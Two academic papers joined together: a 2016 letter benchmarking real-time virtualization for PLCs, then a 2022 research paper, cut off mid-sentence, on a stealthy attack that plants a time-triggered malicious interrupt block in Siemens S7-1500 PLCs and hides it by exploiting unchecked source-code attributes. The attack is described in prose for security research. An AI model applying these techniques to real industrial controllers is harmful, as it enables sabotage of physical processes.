technologies for ICS has been a slow 1943-0663 c/circlecopyrt2016 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. Seehttp://www.ieee.org/publications_standards/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. 70 IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 process (as with any other new technology), and not as straightforward. Only recently operators started virtualiz- ing SCADA master stations, human machine interfaces, andhistorian database servers, using commercial off-the-shelf(COTS) hypervisors [ 2]. This was enabled by the emergence of hardware-assisted memory management and I/O mecha- nisms [ 3], providing adequate performance guarantees while avoiding resource overprovisioning. But PLC virtualization is a different matter, as the require- ments for its RTOS environment and communications pri-oritize low and consistent latency. Most COTS hypervisors for x86 are designed for general-purpose workloads where throughput is priority, resorting to techniques such as hardwareresource sharing or deferred interrupt processing, which havea penalty in terms of latency and determinism. For this reason,RT-sensitive applications such as servo control for computer- ized numerical control machinery cannot be reliably hosted within such hypervisors, as it only takes a single latency peakto create a signi cant positioning skew. Achieving RT compliance may prove dif cult, even for native execution. For instance, the end-to-end response latency for components on interconnected buses can be affected byaspects such as interrupt latency, message propagation delays,asynchronous periodic task overhead or RTOS task schedul-ing overhead. Particularly, interrupt latency and CPU overhead involved in servicing interrupts are paramount in embedded systems used for control applications. For example, [ 4] and [ 5] estimate interrupt and context switch latency requirements of280 and 800 s for machine and process control industrial applications, respectively. For extreme cases, such as motion control applications, PLCs have to provide very low operation latencies, from 1ms to 250 s (Class 3 RT Systems [ 6]). Originally, interrupt processing in the x86 PC architec- ture was based on programmable interrupt controllers (PIC).Cascaded 8259 PIC provided up to 15 xed-priority interrupts channels using pointers to locate the vector entry points for the interrupt service routines associated with each channel.Later, the IO-advanced PIC (APIC) was introduced, support-ing up to 24 interrupt channels, multiprocessor systems andprogrammable priorities while an improvement in compari- son with the dual PIC arrangement, APIC interrupt processing and routing was a latency-prone, multistep procedure [ 4]. Things considerably improved with the advent of PCI express (PCIe) and the message signaled interrupts (MSI)model, which supports 224 interrupts, eliminates the need to use the IO-APIC, and allows every device to write directly to the CPU s local-APIC, avoiding out-of-band interrupt sig-nalling overhead, by using memory write operations. MSIsreduce the latency and CPU overhead involved in servicinginterrupts, improving system performance and IO responsive- ness. Latency can improve as much as 300% when compared to IO-APIC and 500% when compared with 8259-PIC [ 4]. Table Iillustrates the results for IO-APIC and MSI modes. Modern x86 CPUs provide code density and memory band- width, supporting single instruction multiple data (SIMD) instruction set architecture extensions such as streaming SIMD instructions or advanced vector extensions (akinto an integrated DSP, with compilers performing auto-vectorization, eliminating communication, and transport overhead). However, not all x86 developments bene t real-time applications: power optimization and throughput-enhancing technologies, such as frequency-scaling or hardwareTABLE I INTERRUPT LATENCY COMPARISON (FROM [4]) Fig. 1. vPLC deployment (adapted from [ 7]). threads (hyperthreading), harm deterministic behavior though most of them can be disabled or ne-tuned. Still, some notable (if somewhat odd) exceptions persist, such as system management interrupts (SMI). SMIs were originally introduced to support power manage- ment capabilities, and later used for other functions such as USB legacy peripheral device emulation. An SMI event asyn- chronously suspends all normal program execution in orderto switch to a special system management mode, where spe-ci c rmware code is executed for this reason, SMIs are acommon cause of latency spikes. Explicit SMI control is not possible in all x86 platforms, as it depends on speci c chipset, rmware and original equipment manufacturer options. Overall, the x86 platform has become an interesting can- didate to host PLC applications, despite some manageableshortcomings (e.g., several providers of RT turnkey solu- tions provide certi ed hardware lists, while some tier-1 OEMs resort to custom rmware or provide mechanisms to disablenoncritical SMIs for RT usage). B. Virtual PLC Recent developments, such as low-latency deterministic net- work connectivity for converged Ethernet (able to supportrobust distributed I/O) and the availability of real-time hyper-visors, made it possible to virtualize PLC components [ 7]. The proposed vPLC architecture (Fig. 1) takes advantage of these capabilities, by decoupling the PLC execution environ-ment from I/O modules using a software-de ned networking(SDN)-enabled Ethernet networking fabric to provide connec-tivity to the I/O subsystem. This departs from the existing SoftPLC concept (which mostly runs on COTS x86 systems, eventually using RTOS systems, such as [ 8] and [ 9]), by adopt- ing an approach close to [ 10] and [ 11] but going one step further, by leveraging converged fabric scenarios with SDN. In the vPLC the dedicated PLC I/O bus is replaced by a deterministic and high-speed networking infrastructure, using SDN to enable the exible creation of virtual channels onthe I/O fabric. These channels provide connectivity between Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. CRUZ et al. : VIRTUALIZING PLCs: TOWARD A CONVERGENT APPROACH 71 the vPLC instances and physical I/O modules, which can be implemented using FPGA or application speci c integrated circuit technology. Finally, virtual channel recon gurationis managed by means of an SDN controller, via a high-availability server (not depicted in the gure) which monitorsSDN switch statistics and path reachability, recon guring channel paths in case of performance degradation or failure. This model is similar to remote or distributed I/O PLC topologies, where networked I/O modules act as extensions ofthe PLC rack, or even critical avionics systems, which replacelegacy interconnects with Ethernet-based technologies such as avionics full-duplex switched Ethernet [ 12]. In fact, initiatives such as converged plantwide Ethernet [ 13] already point in this direction. Developments in cut-through switching, togetherwith remote direct memory access, allow for port-to-portlatencies in the order of hundredths of nanoseconds in 10G Ethernet switch fabrics and application latencies in the order of microseconds [ 14]. Also, resources such as Intel s data plane development kit [ 15] enable low latency, high-throughput packet processing mechanisms that bypass kernels, bringing the network stack into userspace and enabling adapters to per- form DMA operations. This enables single-digit microsecondjitter and restricted determinism, allowing for bare-metal per-formance on commodity server hardware. Additionally, timedivision-based approaches using IEEE 1588 clock synchro- nization, such as time sensitive networking [ 16] allow for real-time requirements in the microsecond range on COTSEthernet, compatible with strict isochronous operation needs. Finally, real-time static partitioning hypervisors, such as Jailhouse [ 17]o rP i k e O S[ 18], make it possible to host RTOS guest VMs for real-time and certi able workloads, with PikeOS closely replicating the ARINC 653 [ 12] partitioning model for safety-critical avionics RTOS. Moreover, [ 19] points to the possibility of providing RT capabilities in the KVM [ 20] hypervisor, when combined with the Linux RT-Preempt [ 21] patch and speci c tuning. In such environments, resources such as PLC watchdogs and system-level debugging and trac-ing analysis mechanisms (useful for continuous security and/orsafety assessment) can be implemented at the hypervisor level,which is able to oversee partition behavior. III. E VA L UAT I O N Evaluation is focused on understanding to which point partitioning techniques may prove effective for implement- ing real-time hypervisor environments, when used on modernhardware. The test platform uses an Intel Core i7-4770 runningat 3.40 GHz (Haswell family) paired with 16 GB DDR3 RAM, using Debian Linux 8.4 with kernel version 3.18.29. Three ver- sions of the kernel were used: 1) baseline, with the standarddistribution settings; 2) host-optimized, with KVM hypervisorsupport; and 3) guest-optimized. The latter two were compiledwith the RT-pre-empt patch, for realtime support. Latency measurements were performed using cyclictest [22] to measure the response latency for four timer threads clockedat 10 ms, spaced 500 s from each other and run with a high scheduler priority (PRIO_FIFO), to emulate an RT task.Stress [23] was used for workload generation, instantiating 20 simultaneous threads (10 for CPU bound tasks and 10 for spinning malloc/free operations on 64 MB blocks), enough toexhaust a single core. Tests were based on 120 min runs. The rst round of tests (Fig. 2) focused on compar- ing a baseline system con guration using a standard kernel,Fig. 2. Bare metal test results. with hyperthreading and power management support enabled, comparing it with an RT-optimized con guration. For the lat- ter purpose, all power management features were disabled(c-states, dynamic core frequency, and PCIe power man-agement), as well as hyperthreading support, which have anegative impact on latency and jitter. Also, the Linux ker- nel was con gured with core isolation, removing cores 1 to 3 from process scheduling and balancing algorithms, interruptprocessing (whose af nity was manually adjusted to core 0)and other tasks, such as read-copy update threads. The testworkload contemplates three scenarios: 1) idle state; 2) load on shared core (load generator and latency test scheduled on core 1); and 3) split core tests (latency and stress generatorrunning on cores 1 and 2, respectively emulating a scenariowhere best effort and RT tasks could be run on separate cores). Results show the default con guration to be unreliable for RT purposes. While the 2 (split) core test shows improvement, there are large latency spikes, probably due to dynamic powermanagement and scaling, together with dynamic OS corescheduling and low core usage. Results for the RT-optimizedcon guration show large improvements, with the system behaving within very low latency margins, with low jitter and spikes in fact, these margins are within the acceptable rangefor several motion control applications. These values could befurther improved using specialized RTOS or kernel extensionssuch as Xenomai or RTAI [ 24]. The second round of tests (Fig. 3) evaluated RT perfor- mance for a single VM, using resource partitioning and twouse cases: 1) a VM with a single processor core assignedand 2) the same VM with three processor cores using coreaf nity and memory locking on both cases. The three-core VM used the same test pattern of the bare-metal RT-optimized tests. Results show that, despite the contention effects (every-thing is running on the same core), the single core VM showsa controlled behavior which is acceptable for a wide range of PLC-class applications. Nested partitioning tests [3 core VM, 2 core (split)] demonstrated the possibility of running RTapplications with even stricter timings within VMs. Moreover,there is a considerable margin for improvement in terms ofhypervisor mechanisms and VM payload (e.g., we achieved a2 s average latency with small jitter using a Xenomai co-kernel, in the same setup). The third round of tests (Fig. 4) evaluated concurrent real- time VM performance, using resource partitioning for 3 VMswith a 1:1 core assignment ratio. Results show a uniform and consistent behavior pattern across the 3 VMs, demonstrating the performance isolation of the partitioning approach. Overall, the tests show that optimized resource partition- ing provides performance guarantees for isolated workloads,while ensuring adequate graceful degradation under heavy Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply. 72 IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 Fig. 3. Test results for 1 VM. Fig. 4. Test results for 3 VMs. load (a situation that nonetheless must be avoided for RT workload cores). Results can be further improved by soft-ware optimization and enhancements such as device af nity(using IO-MMU [ 3] mechanisms) or even cache partitioning (e.g., Intel s cache allocation technology), which extend the partitioning concept down to the CPU L3 cache, achieving better latency and further containing and isolating partitionedworkloads. IV . C ONCLUSION The proposed vPLC constitutes a convergent approach in the sense that isolated PLC devices are virtualized and co-hostedon the same physical equipment, with distributed I/O being consolidated on the networked I/O fabric. This constitutes a convergence of computing and communication resourcestoward a uni ed infrastructure, much in the same way as ithappened with datacenter architectures in the IT domain. Evaluation results show that the vPLC is feasible from a systems virtualization perspective, with a considerable margin for further improvement on 86 platforms. Nonetheless, this letter is focused on the presentation of the vPLC conceptand evaluation of the suitability of 86 virtualization for concurrent PLC workloads. Next developments include the implementation and validation of the SDN-based I/O orches-tration and RT communications capabilities (using Xenomai sreal-time driver model framework) that provide the couplingof the vPLC instances with the physical infrastructure in order to comply with determinism and latency requirements. Finally, it should be stressed that, despite its name, the vPLC is more than the simple virtualization of the PLC device, con-stituting an integrated approach where the device seamlessly merges with the infrastructure, providing potential bene ts in terms of manageability, cost, and security.R EFERENCES [1] R. Langner, To kill a centrifugue: A technical analysis of what Stuxnet s creators tried to achieve, Langner Group, Berlin, Germany:Tech. Rep., 2013. [Online]. Available: http://www.langner.com/ en/wp-content/uploads/2013/11/To-kill-a-centrifuge.pdf [2] J. Reeser, T. Jankowski, and G. M. Kemper, Maintaining HMI and SCADA systems through computer virtualization, IEEE Trans. Ind. Appl. , vol. 51, no. 3, pp. 2558 2564, May/Jun. 2015. [3] M. Garc a-Valls, T. Cucinotta, and C. Lu, Challenges in real-time vir- tualization and predictable cloud computing, J. Syst. Architect. , vol. 60, no. 9, pp. 726 740, 2014. [4] L. Kean, Microcontroller to Intel architecture conversion: PLC using Intel atom processor, Intel Corp., Santa Clara, CA, USA, White Paper,2010. [5] S. Balacco and C. Lanfear, The embedded software strategic mar- ket intelligence program 2002/2003 vol. I: Embedded systems marketstatistics, Venture Develop. Corp., Mill Valley, CA, USA, Tech. Rep.,2003. [6] C. E. Pereira and P. Neumann, Industrial Communication Protocols , S. Y . Nof, Ed. Heidelberg, Germany: Springer-Verlag, 2009. [7] T. J. Cruz, R. Queiroz, P. Simoes, and E. Monteiro, Security implica- tions of SCADA ICS virtualization: Survey and future trends, in Proc. 15th Eur. Conf. Cyber Warfare Security (ECCWS) , Munich, Germany, 2016, pp. 74 83. [8] Codesys GmbH. Codesys Control The Controller Functionality Software . Accessed on Apr. 29, 2016. [Online]. Available: https://www .codesys .com [9] ISaGRAF. Isagraf Overview . Accessed on Apr. 29, 2016. [Online]. Available: http://www .isagraf .com [10] Intel Corporation, Reducing cost and complexity with industrial system consolidation, White Paper, 2013. [11] IntervalZero, A soft-control architecture: Breakthrough in hard real- time design for complex systems, White Paper, 2010. [12] C. M. Fuchs, The evolution of avionics networks from ARINC 429 to AFDX, in Proc. Innov. Internet Technol. Mobile Commun. Aerosp. Netw. , vol. 65. 2012, pp. 65 76. [13] P. Didier et al. , Converged plantwide Ethernet (CPwE) design and implementation guide, Cisco Press, Indianapolis, IN, USA, Tech. Rep. ENET-TD001E-EN-P, 2011. [Online]. Available: http://literature.rockwellautomation.com/idc/groups/literature/documents/td/enet-td001_-en-p.pdf [14] M. Beck and M. Kagan, Performance evaluation of the RDMA over Ethernet standard in enterprise data center infrastructure, in Proc. 3rd Workshop Data Center Convergent Virtual Ethernet Switch. , San Francisco, CA, USA, 2011, pp. 9 15. [15] W. Zhang, T. Wood, K. K. Ramakrishnan, and J. Hwang, SmartSwitch: Blurring the line between network infrastructure & cloud applications, inProc. 6th USENIX Workshop Hot Topics Cloud Comput. , Philadelphia, PA, USA, 2014. [16] IEEE. Time-Sensitive Networking Task Group . Accessed on May 18, 2016. [Online]. Available:http://www .ieee802 .org/1/pages/tsn .html [17] Siemens AG. Jailhouse Partitioning Hypervisor . Accessed on May 18, 2016. [Online]. Available: https://github .com/siemens/jailhouse [18] C. Baumann, T. Bormer, H. Blasum, and S. Tverdyshev, Proving mem- ory separation in a microkernel by code level veri cation, in Proc. 14th IEEE Int. Symp. Object/Comp./Service Orient. Real Time Distrib. Comput. , 2011, pp. 25 32. [19] R. Riel, Real-time KVM from the ground up, in Proc. KVM Forum , 2015. [Online]. Available: http://www.linux-kvm.org/ images/2/24/01x02-Rik_van_Riel-KVM_realtime.pdf [20] KVM Project . Accessed on May 18, 2016. [Online]. Available: http://www .linux-kvm .org [21] H. Fayyad-Kazan, L. Perneel, and M. Timmerman, Linux PREEMPT-RT v2.6.33 versus v3.6.6: Better or worse for real-time applications? ACM SIGBED Rev. , vol. 11, no. 1, pp. 26 31, Feb. 2014. [22] RT Linux WiKi . Accessed on May 18, 2016. [Online]. Available: http://rt .wiki .kernel .org [23] Stress Project . Accessed on May 18, 2016. [Online]. Available: http:// people.seas.harvard.edu/ apw/stress [24] A. Barbalace et al. , Performance comparison of VxWorks, Linux, RTAI and Xenomai in a hard real-time application, in Proc. 15th IEEE-NPSS Real Time Conf. , Batavia, IL, USA, Apr. 2007, pp. 1 5. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:10 UTC from IEEE Xplore. Restrictions apply.
No_Need_to_be_Online_to_Attack_-_Exploiting_S7-1500_PLCs_by_Time-Of-Day_Block.pdf
In this paper, we take the attack approach intro- duced in our previous work [8] one more step in the direction of exploiting PLCs of ine, and extend our experiments to cover the latest and most secured Siemens PLCs line i.e. S7-1500 CPUs. The attack scenario conducted in this work aims at confusing the behavior of the target system when malicious attackers are not connected neither to the victim system nor to its control network at the very moment of the attack. The new approach presented in this paper is comprised of two stages. First, an attacker patches the PLC with a speci c interrupt block, Time- of-Day , once he manages successfully to access/compromise an exposed PLC. Then he triggers the block at a later time the attacker wishes when he is completely of ine i.e., disconnected to the control network. For a real-world implementation, we tested our approach on a Fischertechnik system using an S7- 1500 CPU that supports the newest version of the S7CommPlus protocol i.e. S7CommPlus v3. Our experimental results showed that we could infect the target PLC successfully and conceal our malicious interrupt block in the PLC memory until the very moment we already determined. This makes our attack stealthy as the engineering station can not detect that the PLC got infected. Finally, we presented security and mitigation methods to prevent such a threat.
978-1-6654-6692-9/22/$31.00 2022 IEEENo Need to be Online to Attack - Exploiting S7-1500 PLCs by Time-Of-Day Block Wael Alsabbagh1,2and Peter Langend rfer1,2 1IHP Leibniz-Institut f r innovative Mikroelektronik, Frankfurt (Oder), Germany 2Brandenburg University of Technology Cottbus-Senftenberg, Cottbus, Germany E-mail: (Alsabbagh, Langendoerfer)@ihp-microelectronics.com Index Terms PLCs, ICSs, Cyber Attacks, Cyber-Physical systems security; I.INTRODUCTION Attackers target the control logic program to compromise exposed Programmable Logic Controllers (PLCs) aiming at sabotaging the control processes driven by the victim industrial devices. Such a threat is known, in the industrial community, as a control logic injection, or a control logic modi cation. It involves manipulating the original user-program that the PLC is programmed with, typically by employing a man in the middle (MITM) approach as reported in [2], [3], [7] [9], [11], [19] [21], [31], [32], [36]. The main vulnerability that attackers exploit in this attack is the lack of integrity algorithms used by PLC protocols. As a response to this threat, most of the ICS vendors recommended engineers and ICS operators to set passwords to avoid unauthorized accesses form malicious adversaries. In other words, when a user tries to gain access to the program running in a PLC, it rst checks if he is authenticated by initiating a so-called authentication protocol. If the authentication process succeeds, it allows him to read/write the program using a proprietary communication protocol. However, this solution could not suf ciently secure PLCs from unauthorized access as previous academic efforts[1] [3], [7], [22], [36] presented successful bypass attacks on the authentication methods used in PLCs from different vendors. Consequently, protecting the control logic programs with only setting passwords failed to prevent attackers from accessing PLCs and manipulating their programs. The existing control logic injection attacks in the research community have two huge challenges: First, a classic injection attack is normally designed to have access to PLCs in certain circumstances [2] [9], [15], [20], [21], [31], [36] e.g., the security means applied are absent or disabled for a speci c reason such as there are ongoing impenitence processes, other hardware components are added/removed to/from the control network, security means are being updated, etc. Despite PLCs during those critical times have a high chance to get unautho- rized infections, but they are not running in their normal states i.e. the physical processes are, more likely, to be temporally off. Thus, if an adversary gains access to the victim PLC dur- ing those times, and conducts his attack right after that, he will, pretty likely, not success in impacting the physical process. Secondly, once the ICS operator is done with any maintenance process, he normally re-activates the security means before operating the system once again. This procedure allows him to detect any infection in the PLC. Our approach introduced in this paper overcomes the above-mentioned challenges by inserting certain malicious instructions in an interrupt block, and then patching the target PLC with the block once the attacker manages to access the control network successfully. The infection remains invisible in the PLC s memory, and will be only activated at a later time that the adversary sets. This ensures that the patch is not being triggered in case the system is not running normally, or being revealed by implemented security means. The prime focus of this paper is on S7 SIMATIC PLCs provided by Siemens. This is because of the fact that Siemens leads the industrial automation market [33] [35], and their SIMATIC families have approximately 30-40% of the entire industry market. Our experiments involve the newest PLC line i.e. S7-1500, and its respective engineering software i.e. Totally Integrated Automation (TIA) Portal software. The motivation behind this work is that Siemens reportedly claimed that its S7-1500 PLCs are pretty secured against various attacks, and the developed S7CommPlus protocol used in such devices has improved anti-replay and integrity check mecha- nisms. For implementing a real-world attack, a Fischertechnik2022 XXVIII International Conference on Information, Communication and Automation Technologies (ICAT) | 978-1-6654-6692-9/22/$31.00 2022 IEEE | DOI: 10.1109/ICAT54566.2022.9811147 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. industry controlled by an CPU S7-1512SP was used. A.Assumptions To conduct a real-world attack scenario, as TRITON [12] and Ukraine power grid attack [13], we suppose that an adversary has already access to the control network. Knowing that attackers can gain access to the control network via a typical IT attack e.g., an infected USB stick or a typical social engineering attack e.g., shing attack. To make our attack more challenging, we also assume that the adversary has no access to the engineering software, and can only record the network traf c between the PLC and the engineering software using a packet-snif ng tool such as Wireshark1. B.Attacker s goal The attacker aims at confusing the control logic of a victim PLC at a time when he is disconnected to the target or its network i.e. he is completely of ine at the point zero for the attack. Furthermore, the infection must remain concealed as long as the interrupt condition is not met. i.e. until the very moment determined by the attacker. In other words, the infection must not be revealed in the time between infecting the PLC and the attack launch date. C.Attack Scenario In this paper, we conduct the attack approach presented in gure 1. Taking into consideration the assumptions mentioned earlier, our attack consists of two main phases as follows: Fig. 1: Attack Scenario 1)Infecting the PLC :in this phase, the attacker patches the control logic program with a malicious block, precisely with the interrupt Time-of-Day (ToD) block, using the Organization Block 10 (OB10). This phase functions online i.e. when an attacker gains access to the target PLC. Please note that throughout this phase, the infection is hidden and set at idle mode to meet the second attacker s goal. 2)Triggering the infection :the attacker triggers the ma- licious block at a determined date and time on his will. This phase functions of ine i.e. without the need to be connected to the PLC/network at the point zero for the attack. The rest of this work is organized as follows. Section II provides related works. Section III presents an overview of 1https://www.wireshark.org/the latest S7CommPlus protocol version. In section IV , Our experimental setup is shown, followed by the description of our attack approach in V . Section VI assesses and discusses the impact of our attack, and then suggests some possible mitigation methods against such a threat. Finally, we conclude our work in section VII. II.RELATED WORK The most known attack representing a typical control logic injection attack is the one that targeted the Iranian nuclear facility in 2010, namely as Stuxnet [10]. More recent real- world attacks occurred in Ukraine [13], [15], and in Germany [17]. However, in the following, we overview the recent related academic works. In 2015, Klick et al. [4] introduced a malicious injection into the program running in a SIMATIC PLC, without confusing the execution process of the user-program. In a follow up work, Spenneberg et al [5] published a PLC worm. The infec- tion approach presented in their work was spreading internally from one PLC to another. A Ladder Logic Bomb malware written in ladder logic or one of the high-level programming languages was introduced in [6]. This malicious malware was injected by an adversary into a control logic program running in an exposed PLC. In 2021, researchers in [2] showed that S7-300 PLCs are vulnerable to control modi cation attacks and demonstrated that confusing a physical process controlled by an infected PLC is feasible. After compromising the security measures, the authors conducted an injection attack and managed successfully to keep their infection hidden from the engineering software. Their concealment approach is based on engaging a fake PLC impersonating a real uninfected PLC. The authors of [31] overcame the anti-replay mechanism used in the newer S7 PLC models, and presented that a skilled adversary could craft valid captured packets to make malicious changes to the control logic program. The authors of Rogue7 [19] introduced a rogue engineering station that can operate as the engineering software to the PLC and injects any malicious code the attacker wishes. By understanding how cryptographical messages were transferred between the parties, they hided their infection in the PLC s memory. All those mentioned attacks were quite limited, and required from adversaries to be connected to the PLC at the point zero of the attack. Thus, the possibility of being detected by the ICS operators or security means implemented is high. To overcome the existing limitations in the previous works, we introduced a novel attack approach based on injecting PLCs with an interrupt code, precisely with Time-Of-Day block [8]. The certain malicious block used in our attack aims at interrupting the execution process of the program at a certain time the attacker sets. Our experimental results proved the proposed concept of that an adversary could manipulate the control process even if he is not connected to the target PLC. Despite the fact that our attack approach was only conducted on an S7-300 PLC and designed to force the PLC to switch off, the attack was ef cient and could confuse the execution se- quence of the program running in the victim PLC. Such attacks Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. are pretty severe as infected PLCs keep executing the original program appropriately i.e., without being confused/interrupted for hours, days, weeks, months and even years; before the very moment that the adversary wants his attack to trigger. However, the only realistic way to reveal our approach was when the ICS supervisor requested the control logic from the PLC and compared both the online and of ine codes running in the infected device and the engineering station respectively. However, we overcome this challenge as shown later. III. S7C OMM PLUSV3 PROTOCOL The latest S7 protocol version, namely as S7CommPlusV3 [18], is utilized in the newer versions of Totally Integrated Automation (TIA) Portal i.e., from V13 on, and also in the newer CPU S7-1500 rmware e.g. V1.8, 2.0, etc. The newest S7 protocol is developed to involve a sophisticated integrity method and considered to be the securest protocol compared to the prior versions e.g., S7CommPlusV1 and S7commPlusV2. It provides various operations e.g. Start, Stop, Download, Upload, etc. that are translated rst to S7CommPlus messages by the TIA Portal, and then transmitted to the PLC. Figure 2 shows the structure of a regular S7CommPlusV3 message. Fig. 2: The structure of S7CommPlusV3 message After the PLC receives the messages, it acts by executing the control operations required by the user, and then responds back to the engineering software accordingly. These messages are transferred in sessions, each has a unique ID chosen by the PLC. Figure 3 depicts the packets order in a communication session via S7CommPlusV3 protocol. As shown, each session begins with a handshake comprised of four messages. The cryptographic attributes as well as the protocol version and keys are selected over those four messages. After a successful handshake, all packets are integrity- protected utilizing a very sophisticated cryptographic protec- tion mechanism. Please note that explaining the encryption process, or extracting the encrypted keys used in this protocol is out of the scope of this paper. However, [16], [19], [32] provide suf cient technical information about the integrity protection method that the newest version of S7 protocol uses. The S7CommPlus protocol functions in a request-response method. Meaning that, each request packet contains a request- header and request-set. The header involves a function code that identi es the required operation e.g. 0x31 for a download message as shown in gure 4. Fig. 3: Messages exchanged in an S7 session via S7CommPlusV3 Fig. 4: S7CommPlus Download Request - Objects and At- tributes Furthermore, each message contains multiple objects that comprised of attributes. All the objects as well as the attributes are identi ed using unique class identi ers. For instance, the CreateObject request, sent by the engineering software to the PLC over an S7CommPlus download message, builds a new object in the PLC memory with a unique ID (in our given example, 0x04ca ). The download packet therefore generates an object of class ProgramCycleOB . This created object com- prised of multiple attributes, each has speci c values dedicated to a certain aim as follows [32]: -Object MAC : donated with the item value ID: Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Block.AdditionalMac and used as an additional Message Authentication Code (MAC) value in the encryption integrity process. -Object Code : donated with the item value ID: Function- alObject.code . It is the binary executable code that the PLC reads and processes. -Source Code : donated with the item value ID: Block.BodyDescription . It is equivalent to the program written by the ICS operator which is stored in the PLC and can be later uploaded, upon request, to a TIA Portal project. IV.EXPERIMENTAL SET-UP To test our approach presented in this paper, we used a Fischertechnik training factory2as seen in gure 5. Please note that this setup is already used in experiments run earlier, i.e. the following description is very similar to the one in our former publication [32]. Fig. 5: Experimental Set-up The factory is comprised of ve industrial modules: vacuum suction gripper (VGR), high-bay warehouse (HBW), multi- processing station (MPO) with kiln, and sorting line with color recognition (SLD) environment station with surveillance camera (SSC). The entire system is controlled by a SIMATIC S7-1512SP with a rmware V2.9.2, and programmed by TIA Portal V16. The PLC connects to a TXT controller3via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the schertechnik cloud. 2https://www. schertechnikwebshop.com/de-DE/ schertechnik-lernfabrik- 4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de 3https://www. schertechnik.de/en/service/elearning/playing/txt-controllerThe factory we used in our experiments provides two in- dustrial processes. Storing and ordering materials. The default process cycle begins with storing and identifying the material i.e. workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part s colour and its ID- number. Afterwards, the vacuum gripper places suction on the material and transports it to the high bay warehouse which applies a rst-in rst-out principle for the outsourcing. All goods that were stored could be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece on from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation command as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally the production data is written on the material at the end of the production process, and the nished product will be provided for collection. V.ATTACK DESCRIPTION Our approach introduced in this work consists of two phases: infecting the PLC (Online phase), and triggering the interrupt block (Of ine phase). Please take note that, obtaining the IP and MAC address, as well as the model of the victim PLC is out of the scope of this paper, and can be achieved by applying a PN-DCP protocol based scanner [36], S7CommPlus scanner [37], or any other network scanner. In the next two subsections, we illustrate our attack approach in details. A.Infecting the PLC (Online Phase) Here, we aim at patching the victim with malicious com- mands inserted in OB10. For this purpose, we utilize a developed Man-in-the-Middle (MITM) station that contains two components: -TIA Portal Software: to bring back and modify the actual program that the victim device runs. -PLCinjector tool: to patch the PLC with the adversary s malicious code. Our infecting phase is comprised of four steps as follows: 1) reading and writing the user-program. 2) altering and updating the user-program. 3) concealing the malicious infection. 4) transferring the crafted S7 messages. 1)Reading & Writing the user-Program : After gaining access to the control network, we need to steal the user-program that the victim device is programmed with. Figure 6 describes this step. As seen, we launch the attacker s TIA Portal and establish a connection with the target PLC directly. Due to a security gap in the newest S7 PLCs design i.e., S7-1500 series, we were able to communicate with the victim device using an unauthorized TIA Portal software. For a better understanding, the S7-1500 PLC does not implement Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. any security mechanisms or checking procedures to ensure that the presently connected TIA Portal software is the same one that the PLC communicated with in a previous communication session [32]. This vulnerability allows any adversary having a TIA Portal software installed on his machine to easily communicate with S7 PLCs without any effort. After the communication is successfully established, we require the user-program to the attacker s TIA Portal software by sending an upload command. Afterwards, we download it again to the target and record the entire S7CommPlus packets ow transmitted between the attacker s machine and the victim PLC utilizing the Wireshark software. Eventually, the adversary has the user-program on his own TIA Portal software, as well as all the captured messages dedicated to the download command are saved in a Pcap le for a further use in the next steps. Fig. 6: Upload, download, and record the user-program 2)Altering & Updating the user-program : After we retrieve the user-program, the unauthorized TIA Portal displays it in a high-level programming language that it was originally programmed with (e.g. Structured Control Language SCL). By understanding the control process driven by the victim PLC, we can con gure malicious instructions that manipulate certain outputs or inputs in the target system e.g., we can force a certain output to turn off when the interrupt block is being triggered. This is done as follows. We add to the current user-program a new OBwith the speci c event class Time-of-Day , and then entering the name of the block, the desired programming language (e.g. SCL), and the number of the assigned organization block i.e. 10. After that, we program the block with the attacker s commands to be executed when the interrupt occurs. However [30] provides all the technicaldetails to con gure and program Time-of-Day interrupts in S7- 1500 PLCs. In spite of the fact that our malicious code differs with only an extra small-size block (OB10) from the original one, it is suf cient to disturb the control process of our experimental set-up as shown later in the next section. The easiest way to infect the PLC is to write the modi ed program directly to the PLC using the attacker s TIA Portal. This allows the attacker to transfer his program (the original code with the new interrupt block OB10) into the victim PLC without any effort. After the PLC receives the attacker s program, it updates its program successfully without knowing that it is connecting to a non-authorized TIA Portal. 3)Concealing the malicious infection : Downloading the attacker s program into the PLC using the attacker s TIA Portal has a challenge. The legitimate user can easily disclose the infection by requiring the control logic from the patched device, and comparing the of ine program that is saved on the legitimate engineering station i.e., TIA Portal with the online program running on the remote PLC (similar to how the infection in [8] was revealed). To overcome this challenge, we need to conceal the infection from the ICS operator by transferring the attacker s code over a crafted S7CommPlus download message. Siemens provides its S7-1500 PLCs with a precaution procedure that double-checks each session freshness. Thus, it can reveal any potential manipulation and rejects to update its program in case the attributes of the ProgramCycleOB object do not have the same session ID i.e. do not belong to the same session. This procedure is a part of a very complex anti-replay mechanism that Siemens uses to protect its newest PLCs line from replay attacks. However, our observations showed that the PLC does not check the integrity of all the attributes transferred over S7CommPlus protocol as expected. Meaning that, the PLC checks only speci c integrity bytes that only Object Mac andObject Code contain in their bytecodes, whilst theSource Code does not have those integrity bytes, or 